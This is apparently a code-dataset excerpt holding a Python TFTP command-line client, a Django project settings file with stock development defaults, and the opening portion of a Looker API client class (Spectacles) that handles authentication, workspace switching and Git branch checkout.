print(" Must be between %d and %d" % (proto.TFTP_BLKSIZE_MIN, proto.TFTP_BLKSIZE_MAX))
print(" -w --windowsize <n> Set streaming window size (default: %d)" % proto.TFTP_LAN_WINDOW_SIZE)
print(" Must be between %d and %d" % (proto.TFTP_WINDOWSIZE_MIN, proto.TFTP_WINDOWSIZE_MAX))
print()
print("To disable the use of TFTP extensions:")
print(" -r --rfc1350 Strictly comply to the RFC1350 only (no extensions)")
print(" This will discard other TFTP option values.")
print()
def main():
# TODO: convert to optparse
import getopt
try:
opts, args = getopt.getopt(sys.argv[1:], '?h:p:b:w:m:r',
['help', 'host=',
'port=', 'blksize=',
'windowsize=', 'mode=',
'rfc1350'])
except getopt.GetoptError:
usage()
return 1
host = _PTFTP_DEFAULT_HOST
port = _PTFTP_DEFAULT_PORT
mode = _PTFTP_DEFAULT_MODE
exts = {}
rfc1350 = False
for opt, val in opts:
if opt in ('-?', '--help'):
usage()
return 0
if opt in ('-h', '--host'):
host = val
if opt in ('-p', '--port'):
try:
port = int(val)
except ValueError:
print('Port must be a number!')
return 2
if opt in ('-b', '--blksize'):
try:
exts[proto.TFTP_OPTION_BLKSIZE] = int(val)
except ValueError:
print('Block size must be a number!')
return 2
if opt in ('-w', '--windowsize'):
try:
exts[proto.TFTP_OPTION_WINDOWSIZE] = int(val)
except ValueError:
print('Window size must be a number!')
return 2
if opt in ('-m', '--mode'):
if val in proto.TFTP_MODES:
mode = val
else:
print('Transfer mode must be one of: {}'
.format(', '.join(proto.TFTP_MODES)))
return 2
if opt in ('-r', '--rfc1350'):
rfc1350 = True
client = TFTPClient((host, port), exts, mode, rfc1350)
client.serve_forever()
print('Goodbye.')
return 0
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| 33.323907
| 120
| 0.56588
|
from __future__ import print_function
try:
input = raw_input
except NameError:
pass
from datetime import datetime
import os
import shutil
import socket
import stat
import sys
import tempfile
import notify
import proto
import state
l = notify.getLogger('tftp')
_UDP_TRANSFER_SIZE = 2**16
_PTFTP_DEFAULT_PORT = 69
_PTFTP_DEFAULT_HOST = 'localhost'
_PTFTP_DEFAULT_MODE = 'octet'
_PTFTP_DEFAULT_OPTS = {
proto.TFTP_OPTION_BLKSIZE: proto.TFTP_LAN_PACKET_SIZE,
proto.TFTP_OPTION_WINDOWSIZE: proto.TFTP_LAN_WINDOW_SIZE,
}
_PTFTP_RFC1350_OPTS = {
proto.TFTP_OPTION_BLKSIZE: proto.TFTP_DEFAULT_PACKET_SIZE,
}
class UDPMessageSocket(object):
def __init__(self):
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.reset()
@property
def rport(self):
return self._rport
def settimeout(self, timeout):
self._sock.settimeout(timeout)
def send(self, message, peer):
self._sock.sendto(message, peer)
def reset(self):
self._buffer = None
self._rport = None
def close(self):
self._sock.close()
def recv(self, blksize):
if not self._buffer:
self._recv()
if not self._buffer:
return None
opcode = proto.TFTPHelper.get_opcode(self._buffer)
if opcode == proto.OP_DATA:
size = proto.TFTPHelper.get_data_size(blksize)
data, self._buffer = self._buffer[:size], self._buffer[size:]
else:
data, self._buffer = self._buffer, None
return data
def _recv(self):
(data, (address, port)) = self._sock.recvfrom(_UDP_TRANSFER_SIZE)
if not self._rport:
self._rport = port
elif port != self._rport:
return
self._buffer = data
class TFTPClient(object):
PTFTP_STATE = None
def __init__(self, peer, opts=None, mode='octet', rfc1350=False,
notification_callbacks=None):
if notification_callbacks is None:
notification_callbacks = {}
self.peer = peer
self.transfer_mode = mode
self.error = False
self.rfc1350 = rfc1350
self.opts = opts
if rfc1350:
self.opts = _PTFTP_RFC1350_OPTS
print('Running in RFC1350 compliance mode.')
else:
if not self.opts:
self.opts = _PTFTP_DEFAULT_OPTS
if proto.TFTP_OPTION_BLKSIZE not in self.opts:
self.opts[proto.TFTP_OPTION_BLKSIZE] = \
_PTFTP_DEFAULT_OPTS[proto.TFTP_OPTION_BLKSIZE]
notify.CallbackEngine.install(l, notification_callbacks)
def connect(self):
self.sock = UDPMessageSocket()
self.sock.settimeout(state.STATE_TIMEOUT_SECS)
print('Connected to {}:{}.'.format(self.peer[0], self.peer[1]))
def finish(self):
self.sock.close()
def serve_forever(self):
self.connect()
while True:
print()
try:
command = input('tftp> ')
except EOFError:
print()
break
if not command:
continue
cmd_parts = command.split(' ')
if cmd_parts[0] in ('?', 'help'):
self.usage()
elif cmd_parts[0] in ('g', 'get'):
self.get(cmd_parts[1:])
elif cmd_parts[0] in ('p', 'put'):
self.put(cmd_parts[1:])
elif cmd_parts[0] in ('q', 'quit'):
break
elif cmd_parts[0] in ('m', 'mode'):
self.mode(cmd_parts[1:])
elif cmd_parts[0] in ('b', 'blksize'):
self.blksize(cmd_parts[1:])
elif cmd_parts[0] in ('w', 'windowsize'):
self.windowsize(cmd_parts[1:])
else:
print('Unrecognized command. Try help.')
self.finish()
def usage(self):
print('Available commands:')
print()
print('? help Display help')
print('q quit Quit the TFTP client')
print('m mode [newmode] Display or change transfer mode')
print('b blksize [newsize] Display or change the transfer block size')
print('w windowsize [newsize] Display or change the transfer window size')
print()
print('g get [-f] <filename> Get <filename> from server.')
print(' (use -f to overwrite local file)')
print('p put <filename> Push <filename> to the server')
print()
def handle(self):
if not self.PTFTP_STATE:
self.error = (True, 'Connection state error.')
return
self.error = False
self.sock.reset()
while not self.PTFTP_STATE.done and not self.error:
try:
blksize = self.opts[proto.TFTP_OPTION_BLKSIZE]
request = self.sock.recv(blksize)
if not request:
continue
except socket.timeout:
self.error = (True, 'Connection timed out.')
return
if not self.PTFTP_STATE.tid:
self.PTFTP_STATE.tid = self.sock.rport
print('Communicating with {}:{}.'
.format(self.peer[0], self.PTFTP_STATE.tid))
response = None
opcode = proto.TFTPHelper.get_opcode(request)
if not opcode:
self.error = (True, None)
response = proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
elif opcode not in proto.TFTP_OPS:
self.error = (True,
"Unknown or unsupported operation %d!" % opcode)
response = proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
else:
try:
handler = getattr(self, "serve%s" % proto.TFTP_OPS[opcode])
response = handler(opcode, request[2:])
except AttributeError:
self.error = (True, 'Operation not supported.')
response = proto.TFTPHelper.createERROR(
proto.ERROR_UNDEF, 'Operation not supported.')
if response:
peer = (self.peer[0], self.PTFTP_STATE.tid)
self.sock.send(response, peer)
def serveOACK(self, op, request):
try:
opts = proto.TFTPHelper.parseOACK(request)
except SyntaxError:
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
opts = proto.TFTPHelper.parse_options(opts)
if opts:
self.PTFTP_STATE.set_opts(opts)
else:
self.error = (True, 'Transfer options parsing failed.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_OPTION_NEGOCIATION
if self.PTFTP_STATE.state == state.STATE_RECV:
self.PTFTP_STATE.state = state.STATE_RECV_ACK
return self.PTFTP_STATE.next()
def serveACK(self, op, request):
try:
num = proto.TFTPHelper.parseACK(request)
except SyntaxError:
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
if self.PTFTP_STATE.state == state.STATE_SEND:
if self.PTFTP_STATE.packetnum != num:
self.error = (True,
'Got ACK with incoherent data packet number.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_ILLEGAL_OP
if not self.rfc1350 and num >= proto.TFTP_PACKETNUM_MAX-1:
print('Packet number wraparound.')
return self.PTFTP_STATE.next()
elif self.PTFTP_STATE.state == state.STATE_SEND_LAST:
self.PTFTP_STATE.done = True
return None
print('ERROR: Unexpected ACK!')
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
def serveDATA(self, op, request):
try:
num, data = proto.TFTPHelper.parseDATA(request)
except SyntaxError:
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
if len(data) > self.PTFTP_STATE.opts[proto.TFTP_OPTION_BLKSIZE]:
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
if self.PTFTP_STATE.state == state.STATE_RECV:
if num != self.PTFTP_STATE.packetnum:
self.error = (True, 'Got DATA with incoherent packet number.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_ILLEGAL_OP
else:
self.PTFTP_STATE.data = data
if not self.PTFTP_STATE.done and not self.rfc1350 and \
num >= proto.TFTP_PACKETNUM_MAX - 1:
print('Packet number wraparound.')
return self.PTFTP_STATE.next()
print('ERROR: Unexpected DATA!')
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
def serveERROR(self, op, request):
try:
errno, errmsg = proto.TFTPHelper.parseERROR(request)
except SyntaxError:
return None
if self.PTFTP_STATE.op == proto.OP_RRQ:
self.PTFTP_STATE.purge()
self.error = (True, errmsg)
return None
def get(self, args):
if len(args) < 1 or len(args) > 2:
print('Usage: get [-f] <filename>')
return False
filepath = args[0]
overwrite = False
if len(args) == 2:
filepath = args[1]
if args[0] == '-f':
overwrite = True
(_, filename) = os.path.split(filepath)
if not overwrite:
try:
open(filename)
print('Error: local file {} already exists!'.format(filename))
print('Use get -f to overwrite the local file.')
return False
except IOError:
pass
self.PTFTP_STATE = state.TFTPState(self.peer, proto.OP_RRQ,
'', filepath, self.transfer_mode,
not self.rfc1350)
# Then, before sending anything to the server, open the file
# for writing
try:
# We don't want tempfile to automatically delete the temporary
self.PTFTP_STATE.file = tempfile.NamedTemporaryFile(delete=False)
self.PTFTP_STATE.packetnum = 1
self.PTFTP_STATE.state = state.STATE_RECV
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t write to temporary file {}!'
.format(self.PTFTP_STATE.file.name))
return False
opts = dict(self.opts)
# When not running in RFC1350 compliance mode, append tsize: 0
# to the list of options in the request to get the requested
# file size back in the OACK.
if not self.rfc1350:
opts[proto.TFTP_OPTION_TSIZE] = 0
# Everything's OK, let's go
print("Retrieving '%s' from the remote host..." % filename)
packet = proto.TFTPHelper.createRRQ(filepath, self.transfer_mode, opts)
transfer_start = datetime.today()
self.sock.send(packet, self.peer)
self.handle()
transfer_time = datetime.today() - transfer_start
if self.error:
error, errmsg = self.error
if error and errmsg:
print('Error: {}'.format(errmsg))
# Remove the temporary file on error. The destionation file,
# if it already existed, is left untouched.
self.PTFTP_STATE.file.close()
os.remove(self.PTFTP_STATE.file.name)
return False
# Copy the temporary file to its final destination
try:
shutil.copy(self.PTFTP_STATE.file.name, filename)
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t copy temporary file to local file {}!'
.format(filename))
return False
print('Transfer complete, {} bytes ({:.2f} kB/s)'
.format(self.PTFTP_STATE.filesize,
self.__get_speed(self.PTFTP_STATE.filesize,
transfer_time)))
self.PTFTP_STATE.file.close()
os.remove(self.PTFTP_STATE.file.name)
return True
def put(self, args):
if len(args) != 1:
print('Usage: put <filename>')
return
filepath = args[0]
self.PTFTP_STATE = state.TFTPState(self.peer, proto.OP_WRQ,
'', filepath, self.transfer_mode,
not self.rfc1350)
try:
self.PTFTP_STATE.file = open(filepath, 'rb')
self.PTFTP_STATE.filesize = os.stat(filepath)[stat.ST_SIZE]
self.PTFTP_STATE.packetnum = 0
self.PTFTP_STATE.state = state.STATE_SEND
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t read from local file {}!'.format(filepath))
return False
opts = dict(self.opts)
# When not running in RFC1350 compliance mode, append the
# tsize option to the request options to specify the
# transfered file size to the server.
if not self.rfc1350:
opts[proto.TFTP_OPTION_TSIZE] = self.PTFTP_STATE.filesize
# Everything's OK, let's go
print("Pushing '%s' to the remote host..." % filepath)
packet = proto.TFTPHelper.createWRQ(filepath, self.transfer_mode, opts)
transfer_start = datetime.today()
self.sock.send(packet, self.peer)
self.handle()
transfer_time = datetime.today() - transfer_start
if self.error:
error, errmsg = self.error
if error and errmsg:
print('Error: {}'.format(errmsg))
return False
print('Transfer complete, {} bytes ({:.2f} kB/s)'
.format(self.PTFTP_STATE.filesize,
self.__get_speed(self.PTFTP_STATE.filesize,
transfer_time)))
return True
def mode(self, args):
if len(args) > 1:
print('Usage: mode [newmode]')
return
if not len(args):
print('Current transfer mode: {}.'.format(self.transfer_mode))
print('Available transfer modes: {}'
.format(', '.join(proto.TFTP_MODES)))
return
if args[0].lower() in proto.TFTP_MODES:
self.transfer_mode = args[0].lower()
print('Mode set to {}.'.format(self.transfer_mode))
else:
print('Unknown transfer mode, use one of: {}'
.format(', '.join(proto.TFTP_MODES)))
def blksize(self, args):
if len(args) > 1:
print('Usage: blksize [newsize]')
return
if not len(args):
print('Current block size: {} byte(s).'
.format(self.opts[proto.TFTP_OPTION_BLKSIZE]))
return
try:
self.opts[proto.TFTP_OPTION_BLKSIZE] = int(args[0])
print('Block size set to {} byte(s).'
.format(self.opts[proto.TFTP_OPTION_BLKSIZE]))
except ValueError:
print('Block size must be a number!')
def windowsize(self, args):
if len(args) > 1:
print('Usage: windowsize [newsize]')
return
if not len(args):
print('Current window size: {} packet(s).'
.format(self.opts[proto.TFTP_OPTION_WINDOWSIZE]))
return
try:
self.opts[proto.TFTP_OPTION_WINDOWSIZE] = int(args[0])
print('Window size set to {} packet(s).'
.format(self.opts[proto.TFTP_OPTION_WINDOWSIZE]))
except ValueError:
print('Window size must be a number!')
def __get_speed(self, filesize, time):
return (filesize / 1024.0 /
(time.seconds + time.microseconds / 1000000.0))
def usage():
print("usage: %s [options]" % sys.argv[0])
print()
print(" -? --help Get help")
print(" -h --host <host> Set TFTP server (default: %s)" % _PTFTP_DEFAULT_HOST)
print(" -p --port <port> Define the port to connect to (default: %d)" % _PTFTP_DEFAULT_PORT)
print(" -m --mode <mode> Set transfer mode (default: %s)" % _PTFTP_DEFAULT_MODE)
print(" Must be one of:", ', '.join(proto.TFTP_MODES))
print()
print("Available extra options (using the TFTP option extension protocol):")
print(" -b --blksize <n> Set transfer block size (default: %d bytes)" % proto.TFTP_LAN_PACKET_SIZE)
print(" Must be between %d and %d" % (proto.TFTP_BLKSIZE_MIN, proto.TFTP_BLKSIZE_MAX))
print(" -w --windowsize <n> Set streaming window size (default: %d)" % proto.TFTP_LAN_WINDOW_SIZE)
print(" Must be between %d and %d" % (proto.TFTP_WINDOWSIZE_MIN, proto.TFTP_WINDOWSIZE_MAX))
print()
print("To disable the use of TFTP extensions:")
print(" -r --rfc1350 Strictly comply to the RFC1350 only (no extensions)")
print(" This will discard other TFTP option values.")
print()
def main():
# TODO: convert to optparse
import getopt
try:
opts, args = getopt.getopt(sys.argv[1:], '?h:p:b:w:m:r',
['help', 'host=',
'port=', 'blksize=',
'windowsize=', 'mode=',
'rfc1350'])
except getopt.GetoptError:
usage()
return 1
host = _PTFTP_DEFAULT_HOST
port = _PTFTP_DEFAULT_PORT
mode = _PTFTP_DEFAULT_MODE
exts = {}
rfc1350 = False
for opt, val in opts:
if opt in ('-?', '--help'):
usage()
return 0
if opt in ('-h', '--host'):
host = val
if opt in ('-p', '--port'):
try:
port = int(val)
except ValueError:
print('Port must be a number!')
return 2
if opt in ('-b', '--blksize'):
try:
exts[proto.TFTP_OPTION_BLKSIZE] = int(val)
except ValueError:
print('Block size must be a number!')
return 2
if opt in ('-w', '--windowsize'):
try:
exts[proto.TFTP_OPTION_WINDOWSIZE] = int(val)
except ValueError:
print('Window size must be a number!')
return 2
if opt in ('-m', '--mode'):
if val in proto.TFTP_MODES:
mode = val
else:
print('Transfer mode must be one of: {}'
.format(', '.join(proto.TFTP_MODES)))
return 2
if opt in ('-r', '--rfc1350'):
rfc1350 = True
client = TFTPClient((host, port), exts, mode, rfc1350)
client.serve_forever()
print('Goodbye.')
return 0
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| true
| true
|
1c40dd64f42e4bab7e00b275d6fd51fa97380b91
| 3,597
|
py
|
Python
|
hubble/settings.py
|
lqm229026/hubble
|
bc9e5d8d37edf04447b1c52857dc521cd1db91ad
|
[
"Apache-2.0"
] | null | null | null |
hubble/settings.py
|
lqm229026/hubble
|
bc9e5d8d37edf04447b1c52857dc521cd1db91ad
|
[
"Apache-2.0"
] | 7
|
2020-06-06T00:37:24.000Z
|
2022-02-10T11:05:24.000Z
|
hubble/settings.py
|
moonlight824/hubble
|
bc9e5d8d37edf04447b1c52857dc521cd1db91ad
|
[
"Apache-2.0"
] | null | null | null |
"""
Django settings for hubble project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!)=lj#vc=l2k6-n1f*_c!pyz29af2i!xmzsc602^5w!#ki)@tu'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'probe',
'users',
'snippets',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hubble.urls'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSED': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
# 'DEFAULT_RENDERER_CLASSES': [
# 'rest_framework.renderers.JSONRenderer', # use JSON renderer to turn off browsable API
# ],
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination', # use pagination by default
'PAGE_SIZE': 10,
}
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hubble.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
from .local_settings import *
| 26.065217
| 110
| 0.695024
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = '!)=lj#vc=l2k6-n1f*_c!pyz29af2i!xmzsc602^5w!#ki)@tu'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'probe',
'users',
'snippets',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hubble.urls'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSED': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
# 'DEFAULT_RENDERER_CLASSES': [
# 'rest_framework.renderers.JSONRenderer', # use JSON renderer to turn off browsable API
# ],
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination', # use pagination by default
'PAGE_SIZE': 10,
}
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hubble.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
from .local_settings import *
| true
| true
|
1c40de9808148ccedb9de40c4f422ce5a7eb62e1
| 34,880
|
py
|
Python
|
spectacles/client.py
|
DylanBaker/looker-fonz
|
93dea44f14d38b8441f21264b968a4f7845cb690
|
[
"MIT"
] | null | null | null |
spectacles/client.py
|
DylanBaker/looker-fonz
|
93dea44f14d38b8441f21264b968a4f7845cb690
|
[
"MIT"
] | 8
|
2019-09-27T20:41:26.000Z
|
2019-10-02T21:43:31.000Z
|
spectacles/client.py
|
dbanalyticsco/spectacles
|
93dea44f14d38b8441f21264b968a4f7845cb690
|
[
"MIT"
] | null | null | null |
from typing import List, Dict, Optional
import time
from dataclasses import dataclass
import backoff # type: ignore
import requests
from requests.exceptions import Timeout, HTTPError, ConnectionError
import spectacles.utils as utils
from spectacles.types import JsonDict
from spectacles.logger import GLOBAL_LOGGER as logger
from spectacles.exceptions import SpectaclesException, LookerApiError
TIMEOUT_SEC = 300
BACKOFF_EXCEPTIONS = (Timeout, HTTPError, ConnectionError)
@dataclass(frozen=True) # Token is immutable
class AccessToken:
access_token: str
token_type: str
expires_in: int
expires_at: float
def __str__(self) -> str:
return self.access_token
@property
def expired(self) -> bool:
return False if time.time() < self.expires_at else True
class LookerClient:
"""Wraps some endpoints of the Looker API, issues requests and handles responses.
Args:
base_url: Base URL for the Looker instance, e.g. https://mycompany.looker.com.
client_id: Looker API client ID.
client_secret: Looker API client secret.
port: Desired API port to use for requests.
api_version: Desired API version to use for requests.
Attributes:
api_url: Combined URL used as a base for request building.
session: Persistent session to avoid re-authenticating.
"""
def __init__(
self,
base_url: str,
client_id: str,
client_secret: str,
port: Optional[int] = None,
api_version: float = 3.1,
):
supported_api_versions = [3.1]
if api_version not in supported_api_versions:
raise SpectaclesException(
name="unsupported-api-version",
title="Specified API version is not supported.",
detail=(
f"Version '{api_version}' is not supported. "
"Please use one of these supported versions instead: "
f"{', '.join(str(ver) for ver in sorted(supported_api_versions))}"
),
)
self.base_url: str = base_url.rstrip("/")
if port is None and self.base_url.endswith("cloud.looker.com"):
# GCP-hosted instance, so use default port of 443 with HTTPS
if not self.base_url.startswith("https"):
raise SpectaclesException(
name="invalid-base-url",
title="Looker instance base URL is not valid.",
detail="The URL must be an HTTPS URL.",
)
self.api_url: str = f"{self.base_url}/api/{api_version}/"
else:
self.api_url = f"{self.base_url}:{port or 19999}/api/{api_version}/"
self.client_id: str = client_id
self.client_secret: str = client_secret
self.api_version: float = api_version
self.access_token: Optional[AccessToken] = None
self.session: requests.Session = requests.Session()
self.workspace: str = "production"
self.authenticate()
def authenticate(self) -> None:
"""Logs in to Looker's API using a client ID/secret pair and an API version.
Args:
client_id: Looker API client ID.
client_secret: Looker API client secret.
api_version: Desired API version to use for requests.
"""
logger.debug(f"Authenticating to the Looker as client ID '{self.client_id}'")
url = utils.compose_url(self.api_url, path=["login"])
body = {"client_id": self.client_id, "client_secret": self.client_secret}
self.session.auth = NullAuth()
# This should not use `self.post` or it will create a recursive loop
response = self.session.post(url=url, data=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-authenticate",
title="Couldn't authenticate to the Looker API.",
status=response.status_code,
detail=(
f"Unable to authenticate with client ID '{self.client_id}'. "
"Check that your credentials are correct and try again."
),
response=response,
)
result = response.json()
if "expires_at" not in result:
# Calculate the expiration time with a one-minute buffer
result["expires_at"] = time.time() + result["expires_in"] - 60
self.access_token = AccessToken(**result)
self.session.headers = { # type: ignore
"Authorization": f"token {self.access_token}"
}
looker_version = self.get_looker_release_version()
logger.info(
f"Connected to Looker version {looker_version} "
f"using Looker API {self.api_version}"
)
@backoff.on_exception(
backoff.expo,
BACKOFF_EXCEPTIONS,
max_tries=2,
)
def request(self, method: str, url: str, *args, **kwargs) -> requests.Response:
if self.access_token and self.access_token.expired:
logger.debug("Looker API access token has expired, requesting a new one")
self.authenticate()
if self.workspace == "dev":
self.update_workspace("dev")
return self.session.request(method, url, *args, **kwargs)
def get(self, url, *args, **kwargs) -> requests.Response:
return self.request("GET", url, *args, **kwargs)
def post(self, url, *args, **kwargs) -> requests.Response:
return self.request("POST", url, *args, **kwargs)
def patch(self, url, *args, **kwargs) -> requests.Response:
return self.request("PATCH", url, *args, **kwargs)
def put(self, url, *args, **kwargs) -> requests.Response:
return self.request("PUT", url, *args, **kwargs)
def delete(self, url, *args, **kwargs) -> requests.Response:
return self.request("DELETE", url, *args, **kwargs)
def get_looker_release_version(self) -> str:
"""Gets the version number of connected Looker instance.
Returns:
str: Looker instance release version number (e.g. 6.22.12)
"""
logger.debug("Checking Looker instance release version")
url = utils.compose_url(self.api_url, path=["versions"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-version",
title="Couldn't get Looker's release version.",
status=response.status_code,
detail=(
"Unable to get the release version of your Looker instance. "
"Please try again."
),
response=response,
)
return response.json()["looker_release_version"]
def get_workspace(self) -> str:
"""Gets the session workspace.
Args:
project: Name of the Looker project to use.
Returns:
str: The session workspace, dev or production.
"""
logger.debug("Getting the workspace in use by this session")
url = utils.compose_url(self.api_url, path=["session"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-workspace",
title="Couldn't get the workspace.",
status=response.status_code,
detail=(
"Unable to get the workspace in use by this session. "
"Please try again."
),
response=response,
)
return response.json()["workspace_id"]
def update_workspace(self, workspace: str) -> None:
"""Updates the session workspace.
Args:
workspace: The workspace to switch to, either 'production' or 'dev'
"""
logger.debug(f"Updating session to use the {workspace} workspace")
url = utils.compose_url(self.api_url, path=["session"])
body = {"workspace_id": workspace}
response = self.patch(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-update-workspace",
title="Couldn't update the session's workspace.",
status=response.status_code,
detail=(
f"Unable to update workspace to '{workspace}'. "
"If you have any unsaved work on the branch "
"checked out by the user whose API credentials "
"Spectacles is using, please save it and try again."
),
response=response,
)
self.workspace = workspace
def get_all_branches(self, project: str) -> List[str]:
"""Returns a list of git branches in the project repository.
Args:
project: Name of the Looker project to use.
"""
logger.debug(f"Getting all Git branches in project '{project}'")
url = utils.compose_url(
self.api_url, path=["projects", project, "git_branches"]
)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-branches",
title="Couldn't get all Git branches.",
status=response.status_code,
detail=(
f"Unable to get all Git branches in project '{project}'. "
"Please try again."
),
response=response,
)
return [branch["name"] for branch in response.json()]
def checkout_branch(self, project: str, branch: str) -> None:
"""Checks out a new git branch. Only works in dev workspace.
Args:
project: Name of the Looker project to use.
branch: Name of the Git branch to check out.
"""
logger.debug(f"Setting project '{project}' branch to '{branch}'")
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
body = {"name": branch}
response = self.put(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-checkout-branch",
title="Couldn't checkout Git branch.",
status=response.status_code,
detail=(
f"Unable to checkout Git branch '{branch}'. "
"If you have uncommitted changes on the current branch, "
